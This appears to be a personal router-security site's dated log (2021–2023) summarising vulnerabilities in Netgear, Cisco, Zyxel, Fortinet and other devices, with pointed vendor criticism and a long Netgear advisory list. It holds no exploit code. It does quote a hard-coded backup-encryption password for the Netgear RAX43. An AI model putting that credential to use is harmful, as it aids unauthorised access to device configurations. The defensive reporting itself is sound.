"A vulnerability identified in at least 55 Wi-Fi router models can be exploited by miscreants to spy on victims' data as it's sent over a wireless network." At least 55 routers. The bug is in Qualcomm and HiSilicon chips found in various wireless access points. The flaw (CVE-2022-25667) prevents the devices from blocking forged Internet Control Message Protocol (ICMP) messages. These scam messages can be abused to hijack and observe a victim's wireless connectivity. The technical pre-reqs to abuse this flaw are fairly high. A bad guy can onl intercept and snoop on the traffic of another device on the same network. The bad guy also needs to be able to directly communicate with the victim device and know the victim's IP address. In addition, the bad guy must find an open UDP port on the victim device - any open port will do. Needless to say, intercepted traffic is safer if encrypted, so HTTPS and secure DNS are great defenses. The bug seems widespread, they tested 55 products from ten vendors and all were buggy. The vulnerable devices they tested were made by: Cisco, Netgear, 360, Mercury, Xiaomi, Ruijie, H3C, Huawei, Tenda and TP-Link.
MARCH 2023
D-Link drops the ball on security
Security Bulletin by D-Link March 2023
D-Link says "The security and performance of your D-Link devices is of utmost importance to us across all product lines." And yet, take a look at the web page where they publish Security Advisories. Nothing from 2021. Nothing from 2022. Nothing from this year either. Very suspicious. Especially since the items below show there have been security issues with D-Link routers.
Netgear is having a bad stretch
NETGEAR Product Security
Reading about the March 2023 Netgear bugs sent me to the NETGEAR page where they list all their security bug fixes. Pretty big list as you can see below. Netgear issued 18 security bug fixes this month, 26 security bug fixes in December and 70 in November. Chances are, there were some non-security bugs too.
I am starting to consider that perhaps Netgear is not very good at software.
3/22/2023 Security Advisory for Cleartext Transmission on Some Orbi WiFi Systems, PSV-2022-0189
3/22/2023 Security Advisory for Command Injection on Some Orbi WiFi Systems, PSV-2022-0188
3/22/2023 Security Advisory for Command Injection on Some Orbi WiFi Systems, PSV-2022-0187
3/22/2023 Security Advisory for Post-authentication Command Injection on the RBR750, PSV-2022-0186
3/15/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2022-0182
3/15/2023 Security Advisory for Authentication Bypass on Some Routers, PSV-2021-0264
3/15/2023 Security Advisory for Security Misconfiguration on Some Routers and WiFi Systems, PSV-2021-0196
3/15/2023 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2021-0182
3/15/2023 Security Advisory for Post-Authentication Command Injection on Some WiFi Systems, PSV-2021-0179
3/15/2023 Security Advisory for Pre-Authentication Command Injection on Some Router and Extenders, PSV-2021-0076
3/15/2023 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2020-0578
3/15/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers and Extenders, PSV-2020-0482
3/14/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2020-0481
3/14/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2020-0325
3/14/2023 Security Advisory for Denial of Service on Some Routers, PSV-2020-0283
3/14/2023 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0213
3/14/2023 Security Advisory for Security Misconfiguration on Some Routers, PSV-2017-2454
3/9/2023 Security Advisory for Multiple Vulnerabilities on the RAX30, PSV-2022-0352
2/14/2023 Security Advisory for Pre-Authentication Command Injection on Some Cable Modem Routers, PSV-2022-0208
12/28/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0104
12/28/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0208
12/28/2022 Security Advisory for Security Misconfiguration on Some Routers, PSV-2019-0265
12/28/2022 Security Advisory for Authentication Bypass on CAX30, PSV-2022-0196
12/28/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, Extenders, and WiFi Systems, PSV-2021-0275
12/28/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2021-0165
12/28/2022 Security Advisory for Denial of Service on Some Routers and WiFi Systems, PSV-2021-0189
12/28/2022 Security Advisory for Post-Authentication Command Injection on CAX30, PSV-2022-0194
12/28/2022 Security Advisory for Authentication Bypass on CAX30, PSV-2022-0195
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0194
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0221
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0249
12/28/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers and WiFi Systems, PSV-2020-0333
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0478
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0549
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0568
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0569
12/28/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2020-0288
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0565
12/28/2022 Security Advisory for Sensitive Information Disclosure on Some Routers and WiFi Systems, PSV-2020-0428
12/28/2022 Security Advisory for Sensitive Information Disclosure on ReadyNAS OS 6, PSV-2022-0036
12/28/2022 Security Advisory for Sensitive Information Disclosure on Insight iOS App, PSV-2022-0094
12/28/2022 Security Advisory for Sensitive Information Disclosure on Some WiFi Systems, PSV-2020-0448
12/28/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2022-0165
12/13/2022 Security Advisory for Pre-authentication Buffer Overflow on the RAX30, PSV-2022-0291
12/13/2022 Security Advisory for Multiple Vulnerabilities on the RAX30, PSV-2022-0028 & PSV-2022-0073
11/23/2022 Security Advisory for Pre-Authentication Buffer Overflow on RAX120, PSV-2022-0018
11/8/2022 Security Advisory for Denial of Service on Some Routers, PSV-2022-0001
11/8/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2019-0289
11/8/2022 Security Advisory for Security Misconfiguration on R7000, PSV-2020-0005
11/8/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2022-0096
11/8/2022 Security Advisory for Pre-Authentication Stack Overflow on Some Routers, PSV-2019-0121
11/8/2022 Security Advisory for Security Misconfiguration on R6700v3, PSV-2019-0065
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers and Extenders, PSV-2019-0145
11/8/2022 Security Advisory for Post-Authentication Command Injection on Some Routers, PSV-2022-0060
11/8/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0087
11/8/2022 Security Advisory for Denial of Service on Some Routers and Extenders, PSV-2019-0159
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2019-0156
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers and Extenders, PSV-2019-0155
11/8/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0164
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2019-0196
11/8/2022 Security Advisory for Stored Cross Site Scripting on Some Routers, PSV-2020-0016
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers, Extenders, and WiFi Systems, PSV-2020-0122
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Switches, PSV-2022-0016
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Switches, PSV-2022-0015
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0518
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2021-0315
11/7/2022 Security Advisory for Authentication Bypass on Some Routers and Extenders, PSV-2021-0316
11/7/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2022-0033
11/7/2022 Security Advisory for Post-authentication Buffer Overflow on Some Routers, PSV-2022-0156
11/7/2022 Security Advisory for Pre-authentication Buffer Overflow on Multiple Products, PSV-2022-0155
11/7/2022 Security Advisory for Pre-authentication Stack Overflow on some Routers and Nighthawk WiFi Mesh Systems, PSV-2022-0146
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers and WiFi Systems, PSV-2021-031
11/7/2022 Security Advisory for Multiple Vulnerabilities on the R7000P, PSV-2022-0144 & PSV-2022-0145
11/7/2022 Security Advisory for Pre-Authentication Command Injection on R7000, PSV-2022-0115
11/7/2022 Security Advisory for Post-Authentication Command Injection on R6260, PSV-2021-0271
11/7/2022 Security Advisory for Pre-Authentication Stack Overflow on Some Routers, PSV-2021-0346
11/7/2022 Security Advisory for Pre-Authentication Stack Overflow on Some Routers, PSV-2021-0347
11/7/2022 Security Advisory for Post-Authentication Stack Overflow on R7000, PSV-2019-0167
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0118
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2021-0304
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0345
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on R7000P, PSV-2020-0344
11/7/2022 Security Advisory for Denial of Service on SomeWiFi Systems, PSV-2020-0295
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2020-0299
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0303
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0314
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on R7000P, PSV-2020-0312
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on R7000P, PSV-2020-0310
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on R7000P, PSV-2020-0311
11/7/2022 Security Advisory for Stored Cross Site Scripting on Some Routers and WiFi Systems, PSV-2020-0209
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers, Extenders, and WiFi Systems, PSV-2020-0457
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0217
11/7/2022 Security Advisory for Stored Cross Site Scripting on EX7500, PSV-2020-0252
11/7/2022 Security Advisory for Stored Cross Site Scripting on EX7500, PSV-2020-0251
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0259
11/7/2022 Security Advisory for Denial of Service on WiFi Systems, PSV-2020-0260
11/7/2022 Security Advisory for Post-Authentication Stack Overflow on R7000P, PSV-2020-0267
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0358
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Router, PSV-2022-0012
11/7/2022 Security Advisory for Stored Cross Site Scripting on Some Routers, PSV-2020-0447
11/7/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0589
11/7/2022 Security Advisory for Missing Function Level Access Control on Some Routers, PSV-2022-0127
11/7/2022 Security Advisory for Missing Function Level Access Control on R7000, PSV-2022-0133
11/7/2022 Security Advisory for Denial of Service on Some Routers, Extenders, and WiFi Systems, PSV-2021-0153
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers and WiFi Systems, PSV-2020-0449
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2019-0186
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2019-0188
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0215
11/7/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2021-0263
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2022-0061
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers and Extenders, PSV-2019-0248
11/6/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2021-0338
11/6/2022 Security Advisory for Authentication Bypass on Some Routers and Extenders, PSV-2021-0337
11/6/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2022-0005
11/6/2022 Security Advisory for Post-Authentication Stack Overflow on XR300, PSV-2022-0140
Cisco publicizes Netgear bugs
If your Netgear Orbi router isn’t patched, you’ll want to change that pronto
by Dan Goodin of Ars Technica March 22, 2023
The Talos security team (part of Cisco) found four bugs in Netgear routers and within the allotted 90 days Netgear fixed three of them. The remaining bug is hard to exploit. Boring. What's interesting is that two articles referred to remote bad guys exploiting the bugs yet all the descriptions talk about local attacks. So, maybe a bit of hype. Also, Netgear has a hidden Telnet service. Their first attempt to fix one of the bugs was half-assed so it had to be re-done. Bigger picture: Talos found a bug in the RBR750 and said nothing about any other Orbi models. Netgear too, said nothing about any other models. Are we supposed to believe that of the dozen or so Orbi devices only one model had this bug? Really? To me, this is a huge reason to avoid consumer routers.
Critical bug in Fortinet devices
Fortinet: New FortiOS bug used as zero-day to attack government networks
by Sergiu Gatlan of Bleeping Computer March 13, 2023
A new FortiOS bug (CVE-2022-41328) had a fix released on March 7th, after the bug had already been exploited in the wild. The attackers are targeting government and large organizations. The bug allowed attackers to execute unauthorized code or commands. Interestingly the attack was noticed when some Fortigate devices shut themselves down after a Firmware Integrity check failed. Some of their devices verify the integrity of system components and they automatically shut down and stop booting to block a network breach, if a compromise is detected.
Just three months ago, there was another big flaw in Fortinet devices.
FEBRUARY 2023
Aruba devices are a security disaster
Aruba Networks fixes six critical vulnerabilities in ArubaOS
by Bill Toulas of Bleeping Computer March 1, 2023
I started listing router flaws to convince people not to use consumer grade routers. It turns out that when stepping up, at least to Aruba, the security is no better. Maybe worse. Quoting
"Aruba Networks published a security advisory to inform customers about six critical-severity vulnerabilities impacting multiple versions of ArubaOS, its proprietary network operating system." SIX CRITICAL BUGS. Buggy devices can be totally taken over by a remote bad guy. And, all the bugs were all found by one guy. The bugs are in the Aruba Networks access point management protocol, aka the PAPI protocol. Their own protocol. It seems they are not trustworthy. Aruba has released fixes. And, more: several product versions that have reached End of Life (EoL) are also affected by these bugs and will not be patched. Adding insult to injury, the EoL products are also vulnerable to another 15 high-severity and eight medium-severity vulnerabilities. What a s**t show.
JANUARY 2023
Many Zyxel bugs
Positive Technologies helps fix vulnerabilities in routers and other Zyxel devices
by Positive Technologies February 1, 2023
Zyxel has published some fixes for 4 bugs discovered by Positive Technologies expert Nikita Abramov in several series of Wi-Fi routers. The routers work on 4G and 5G networks. The vulnerabilities affected other Zyxel network devices as well, including optical network terminals, Internet gateways, and Wi-Fi amplifiers. Among the buggy devices:
4G LTE routers: LTE3202-M437, LTE3316-M604, LTE7480-M804, LTE490-M904
5G NR routers: NR5103, NR5103E, NR7101, NR7102, NR7103
Optical network terminals (PM7320-B0 and others)
Internet gateways (EX5510-B0 and others)
Wi-Fi amplifiers (WX3100-T0 and others)
Quoting: "... many buffer overflow vulnerabilities arise from incorrect handling of memory (bad allocation or size calculation) or during the data parsing stage, and the execution of commands becomes possible if certain special characters are not filtered. Such flaws often arise from the negligence of developers or insufficient testing.". Ouch. It is not at all clear if Zyxel ever finished issuing bug fixes for all the vulnerable devices.
Cisco to their customers: F... Off
Cisco warns of auth bypass bug with public exploit in EoL routers
by Sergiu Gatlan of Bleeping Computer January 11, 2023
The routers are old, they are buggy and Cisco will not fix them. As the company has done many times before, their solution is for you to buy another router. This bug is in the
web-based management interface of the Cisco Small Business RV016, RV042, RV042G, and RV082 routers. The bug is as bad as bad gets, a remote bad guy can get root access to a buggy router. At this point, I wonder if all Cisco routers are buggy. This bug has the same root cause as many of the previous Cisco bugs - improper validation of user input. The bug is CVE-2023-20025 and it was found in by Hou Liuyang of Qihoo 360 Netlab. A work-around is disable remote administration. The article mentions another similar case: that Cisco would not fix a critical flaw in the RV110W, RV130, RV130W, and RV215W EoL routers.
DECEMBER 2022
Security flaw in Netgear routers
Netgear warns users to patch recently fixed WiFi router bug
by Sergiu Gatlan of Bleeping Computer December 29, 2022
Quoting: "Netgear has fixed a high-severity vulnerability affecting multiple WiFi router models and advised customers to update their devices to the latest available firmware as soon as possible." The buggy devices include the AC and AX Nighthawks. Specifically,models RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7960P and R8000P. The bug is a pre-authentication buffer overflow, which means it can be exploited without knowing the router password. Neither Netgear nor the article said if it is exploitable from the LAN side, WAN side or both. The article said the bug is simple to exploit and Netgear owners are urged to update their firmware ASAP. Neither Netgear or the article said how the company learned of the flaw. I mention this because the Netgear RAX30 was hacked at the recent PWN2OWN contest (see the Router News page).
OCTOBER 2022
Even high end devices can have critical bugs
Fortinet warns admins to patch critical auth bypass bug immediately
by Sergiu Gatlan of Bleeping Computer October 7, 2022
Fortinet has warned their customers of a critical vulnerability in the FortiGate firewalls, FortiProxy web proxies and FortiSwitch Manager (FSWM) management platforms. Bug fixes are available.
The bug, CVE-2022-40684, is an authentication bypass in the administrative interface. It allows remote bad guys to log into vulnerable devices. They offer the usual work-arounds for cases where the software can not be updated: limit the source IPs that can access the admin UI or disable remote management entirely.
SEPTEMBER 2022
Really, I mean it, don't buy Cisco routers
Cisco won’t fix authentication bypass zero-day in EoL routers
by Sergiu Gatlan of BleepingComputer September 7, 2022
We have seen this exact same thing twice before. Three strikes and you're out. Quoting: "Cisco says that a new authentication bypass flaw affecting multiple small business VPN routers will not be patched because the devices have reached end-of-life (EoL). This zero-day bug (CVE-2022-20923) is caused by a faulty password validation algorithm that attackers could exploit to log into the
VPN on vulnerable devices..." Buggy routers are the RV110W, RV130, RV130W, and RV215W. Cisco says to buy a new router. I agree. Any brand but theirs.
AUGUST 2022
Another wide ranging flaw
Exploit out for critical Realtek flaw affecting many networking devices
by Ionut Ilascu of Bleeping Computer August 16, 2022
This is a doozy affecting many devices including routers and access points. The bug is the Realtek SDK, specifically the SIP ALG function that rewrites SDP data, which has a stack-based buffer overflow. Bad guys can remotely execute code without authentication, or just crash a vulnerable device. There is no defense on a buggy device and no easy way to tell if a device is vulnerable. The flaw is identified as CVE-2022-27255. Either there is updated firmware or it will be vulnerable forever. Routers with no open ports can be hacked. Routers that do not expose Remote Management can be hacked. Realtek issued a bug fix in March 2022, so devices made afterwards should be safe. The bug was detailed at the DEFCON conference by cybersecurity company Faraday Security. It is unclear how many networking devices use RTL819x chips but the RTL819xD version of the System on a Chip is in products from more than 60 vendors, including ASUSTek, Belkin, Buffalo, D-Link, Edimax, TRENDnet, Zyxel, Tenda, Hikvision, Rockspace, Nexxt, Keo and others. The bug will likely affect routers the most, but some IoT devices may also be affected. Buggy devices run the open-source eCOS operating system which, as these things go, is pretty low end. It has no virtual storage and no concept of privileges. Every thread can access every memory location.
At this point, you could not pay me to use a Cisco router
Critical flaws found in four Cisco SMB router ranges - for the second time this year
by Simon Sharwood of The Register August 5, 2022
For the second time this year, Cisco small business routers have critical flaws. Three flaws this time. The buggy models are the RV160, RV260, RV340, and RV345 Series.
All three bugs have the same underlying problem, the programmers that work for Cisco are lazy. Put another way, each flaw is due to insufficient input validation. Two of the bugs are critical and a remote bad guy who does not know any passwords can totally take over the routers. Patches are available but the safest approach is to switch router vendors.
DrayTek routers have a critical flaw
Critical RCE vulnerability impacts 29 models of DrayTek routers
by Bill Toulas of Bleeping Computer August 4, 2022
This is the second critical security flaw in DrayTek routers that I am aware of. The bug is a Remote Code Execution flaw with a CVSS v3 severity score of 10 (out of 10). In other words, it is as bad as bad gets. Remote attackers can completely take over vulnerable routers. The flaw is a buffer overflow in the web-based management interface. The bug can be exploited both on the WAN/Internet side and on the LAN side. Bug fixes are available.
JULY 2022
Arris bugs show the company's true personality
Arris / Arris-variant DSL/Fiber router critical vulnerability exposure
by
Derek Abdine July 29, 2022
There are three different bugs in muhttpd software that runs the web administration portal. One of the bugs is critical, two are somewhat impractical to exploit. The buggy muhttpd software
is used in both Arris router products and whitelabel/OEM products by other vendors. The bug has been confirmed in Arris router models NVG443, NVG599, NVG589, NVG510, as well as ISP-customized variants such as BGW210 and BGW320. Here is the bigger issue: "The complete list of affected products is unknown as Arris has declined to comment on the affected product list." Lesson learned, we don't want any products from Arris. The most severe vulnerability allows unauthenticated path traversal from the root of the file system as the root user. This exposes a whole host of sensitive information. The muhttpd software was patched in June 2022. Prior to that the last release of the software was in 2010. Arris is content to use software that had not been updated in 12 years. The path traversal bug appears to be present in the initial release of the muhttpd software in 2006. If the web portal is not available on the WAN side, the critical bug can not be exploited remotely. However, it can still be exploited on the LAN side. This is another reason for VLANs, as it lets us limited which devices can see the router on the LAN side. The Security Checklist page lists some other LAN side protections that block users/devices from getting at the router.
JUNE 2022
Throw away old Cisco small business routers
If you're using older, vulnerable Cisco small biz routers, throw them out
by Jessica Lyons Hardcastle of The Register June 16, 2022
Cisco can not be shamed into fixing old buggy routers. A critical vulnerability exists in the web-based management interface of the Cisco RV110W, RV130, RV130W, and RV215W routers, These models went End of Life back in 2019. The bug is CVE-2022-20825 and it is due to insufficient user input validation of incoming HTTP packets. In other words, lazy programmers. In addition, there is a critical vulnerability in Cisco enterprise security appliances that could allow a remote bad guy to log in to the web management interface. This bug they will fix.
MAY 2022
Well, this is new
Two business-grade Netgear VPN routers have security vulnerabilities that can't be fixed
by Zeljka Zorz of Help Net Security May 20, 2022
Quoting: "Netgear has admitted that multiple security vulnerabilities in its business-grade BR200 and BR500 VPN routers can't be fixed due to technical limitations outside of their control, and is offering users a free or discounted replacement router." Netgear does not offer details of the vulnerabilities, which were reported by Joel St. John of IncludeSecurity. To exploit the bug(s) the router administrator would have to be logged on to the router while they visited a malicious website. Advice about this has been on the home page of this website for years.
Paying lots of money does not get you security
Hackers are exploiting critical bug in Zyxel firewalls and VPNs
by Ionut Ilascu of BleepingComputer May 15, 2022
Jake Baines of Rapid7 discovered a bug in assorted Zyxel devices. Fixes are available. The bug was serious enough that the NSA warned Zyxel customers to patch immediately. These devices are supposed to provide security. The bug is CVE-2022-30525 and the buggy devices are the USG FLEX series, the ATP series, and the USG20-VPN/USG20w-VPN. The bug lets bads guys inject arbitrary commands remotely without authentication. One thing bad guys can do with this is to set up a reverse shell. The bug was due to un-sanitized URI input (sound familiar?) being fed into the os.system method. Rapid7 reported that there are over 15,000 vulnerable devices online. Shadowserver found over 20,000 Zyxel firewall models on the Internet that are potentially affected by the bug.
APRIL 2022
Yet another buggy router
Security audit of the SKYWORTH GN542VF router – how to hack the admin panel password without leaving the web browser!
by Alexey Miloserdov April 5, 2022
The router is somewhat unusual. Each one ships with a unique password. The password is displayed on the login web page, but only if you are on the LAN side, not when you login from the WAN side.
When someone logs in with the correct password from the WAN side, the router shows an error message. Sounds good, at first. However, the password is always in the login page and it is only hidden using JavaScript that can be easily manipulated with developer tools built into the web browser. And, while it does display an error when someone logs in from the WAN side, it nonetheless logs the person in. The error message is a scam. I don't know what country or ISP uses this router.
MARCH 2022
You can't make this up - another Zyxel critical bug
Zyxel urges customers to patch critical firewall bypass vulnerability
by Charlie Osborne, of ZDNet April 1, 2022
A critical vulnerability in Zyxel firewall software has just been fixed. Buggy devices include their USG, ZyWALL, USG FLEX, ATP, VPN and NSG.
The company has fixed "products that are within their warranty and support period" and did not say anything about older devices that may also be vulnerable.
The bug is due to "the lack of a proper access control mechanism". Words with no meaning. The bug lets a bad guy bypass authentication and obtain administrative
access. In other words, it is as bad as bad gets. Bug is CVE-2022-0342.
FEBRUARY 2022
Many Zyxel routers are buggy as heck
Multiple Critical Vulnerabilities in multiple Zyxel devices
by G. Hechenberger, S. Robertz, S. Viehböck and T. Weber of SEC Consult February 15, 2022
"Multiple Zyxel devices are prone to different critical vulnerabilities resulting from insecure coding practices and insecure configuration." All told, SEC Consult found eight different types of bugs. The bugs included: multiple unauthenticated buffer overflows, two unauthenticated Local File Disclosures (which lets bad guys read all files), Unsafe Storage of Sensitive Data and a couple command injection flaws.
Not enough? They also found that Zyxel fails to use OS level protection mechanisms like PIE, stack canaries and relocation read only. SEC Consult offered no workarounds (really?). They also failed to say which, if any of the bugs can be exploited from the WAN side as those are obviously more dangerous than bugs that are exploitable from the LAN side only. There are fixes for some, not all devices. Many devices will not be fixed as they are too old to bother with (EoL). Some other devices will get their bug fixes in September 2022. The timeline shows that Zyxel took over a year before they issued fixes. I am told that Zyxel consumer routers are popular in Europe, especially in the UK. The UK popularity stems from their use of BroadCom chipsets that provide a very stable VDSL2 connection over old copper wire that is prone to line noise.
Yet again, critical security flaws in Cisco routers
Cisco inferno: Networking giant reveals three 10/10 rated critical router bugs
by Simon Sharwood of The Register February 4, 2022
Cisco reminds me of the Wizard of Oz. Seemingly great and powerful on the outside, but inside a dumpster fire of disgracefully buggy software. The buggy hardware this time are the RV160, RV260, RV340 and RV345 products. Cisco revealed that there are 15 bugs, but a handful are brutal - as bad as bad gets. Some of the bugs are fixed, but not all.
JANUARY 2022
Here we go again, another bug in NetUSB affects many routers
Millions of Wi-Fi routers vulnerable to hacker attack — what you need to
do
by Paul Wagenseil of Toms Guide January 11, 2022
Consumer routers are buggy enough without also expecting them to share assorted devices plugged into their USB ports. Software that enables this sharing, NetUSB, was found to be buggy back in May 2015. NetUSB is used in many routers. Which ones? None of your business. Back in 2015, there were 26 router vendors thought to be using NetUSB. Sometimes NetUSB can be disabled via the router web interface, sometimes not. This bug is a buffer overflow and, fortunately, is hard to exploit. NetUSB opens port 20005 on the LAN side of the router. Perhaps most worrying is that some routers are double buggy and open port 20005 on the WAN/Internet side also. If so, the router can be sent commands directly, NetUSB does not do authentication.
The creator of NetUSB, KCodes, was told of the buffer over-run on Sept. 9, 2021, and a patch was issued on Oct. 4th. Netgear routers, the D7800, R6400v2 and R6700v3 were patched on Dec. 20, 2021. Other vendors that license NetUSB, Edimax, D-Link, Tenda, TP-Link and Western Digital have done nothing. D-Link is looking into it. Great reason to avoid TP-Link.
DECEMBER 2021
Bugs in the Netgear Nighthawk RAX43
Netgear Nighthawk RAX43 Multiple Vulnerabilities
by Evan Grant, Jimi Sebree of Tenable December 30, 2021
The bugs are in firmware version 1.0.3.96 which was the latest as of December 28, 2021. This article is dated the 30th and Netgear claims to have released new firmware on the 29th. Just like the below group of bugs with the R6700, some of which were fixed in 90 days. What bugs did Netgear fix? None of your business. Not what you want in a router vendor. Like the R6700, this router also uses HTTP by default for its web interface, saves passwords in plain text, includes old buggy jQuery libraries, includes a vulnerable version of the minidlna service and has insufficient UART protection mechanisms. But, that's not all. Configuration backups are encrypted with a hard-coded password (RAX50w!a4udk). And two bugs can be combined. The first is a buffer overrun, the second, command injection. Together someone can perform remote tasks as root, without authentication. As with the Tenable report below, this one too, does not make it clear which, if any, bugs can be exploited from the WAN side and under what circumstances.
Bugs in the Nighthawk R6700 that Netgear handles poorly
Netgear leaves vulnerabilities unpatched in Nighthawk router
by Bill Toulas of Bleeping Computer December 31, 2021
Cybersecurity company Tenable found six high-risk vulnerabilities in the latest firmware version (1.0.4.120) for the Netgear Nighthawk R6700v3 router. They notified Netgear of the bugs on Sept 30, 2021 and by Dec 30th had heard nothing back from Netgear about any possible fixes. So, they went public with the details. Not what you want from your router vendor. The bugs could let an attacker on the LAN side take complete control of the router. The danger from the WAN side is not clear. One easily understood issue is that insecure HTTP is used by default on communications to/from the device’s web interface. Also, passwords are stored in plain text. In addition to the six bugs, Tenable also found instances of a common problem with routers - the firmware includes old software with known bugs. Specifically, they found several instances of jQuery libraries relying on version 1.4.2 and they found an old buggy version of the MiniDLNA server software. Taking a step back, hardware versions 1 and 2 of this router are too old to fix (End of Life is the official buzzword) so Tenable only examined hardware version 3. Interesting wrinkle, Netgear released a new firmware for this router pretty much at the same time as Tenable went public with the bugs. What did Netgear fix? None of your business. Not what you want from your router vendor.
Consumer routers prove my point, yet again
Nine WiFi routers used by millions were vulnerable to 226 flaws
by Bill Toulas of Bleeping Computer December 2, 2021
This is not the first time an examination of multiple routers has found a huge number of bugs. In this case, nine routers yielded 226 bugs. All were current models running the latest firmware. The routers were from Asus, AVM, D-Link, Netgear, Edimax, TP-Link, Synology, and Linksys. The automated system used to find these bugs only looks for known flaws. The underlying issue is old software that is not upgraded when fixes are made. The TP-Link Archer AX6000 was the worst router, with 32 flaws. The Synology RT-2600ac, which I hated, had 30 bugs. The best router had 18 bugs. The research was done by IoT Inspector, in collaboration with German IT magazine CHIP. They also found a way to send malicious firmware to the D-Link DIR-X1560. Most of the reported bugs have been fixed. Not said, is whether the fixes were for the one tested model or for all similar models. No one ever dwells on that. Also, the fixes were not tested to insure they really fix the problems.
Netgear again
Thousands of Netgear Wi-Fi routers need to be patched now - here's how
by Paul Wagenseil of Toms Guide December 3, 2021
I think Paul is re-using his headlines at this point :-) Not the biggest flaws in the world. What stands out to me is that the bugs were first disclosed to Netgear on May 3, 2021. Long time ago. Buggy devices include 35 different models of routers, Wi-Fi range extenders and combination modem-routers. The bugs were found by British security firm Immersive Labs.
NOVEMBER 2021
If there was ever a case to be made about not using an ISP router, this is it
Six million Sky routers had serious security flaw
by Jane Wakefield of
the BBC November 19, 2021
Quoting: "About six million Sky routers had a significant software bug that could have allowed hackers to take over home networks ... The problem has been fixed - but researchers say it took Sky 18 months to address.". Sky is one of the biggest ISPs in the U.K. The bug was in four Sky Hub models and 2 Booster models. The problem was with DNS rebinding and a malicious web page, anywhere on the Internet, could exploit the flaw. Most of these routers shipped with a default password which is never good. Better routers make you pick a new password at first boot. Anyone who changed the password was safe. It is not clear to me, after reading the report, if changing the internal IP address of the router offers protection from this attack. Final insult: Sky would not maintain communication with the company that found and reported the flaw, Pen Test Partners.
Still more Netgear bugs
Netgear patches severe pre-auth RCE in 61 router and modem models
by Catalin Cimpanu of The Record November 17, 2021
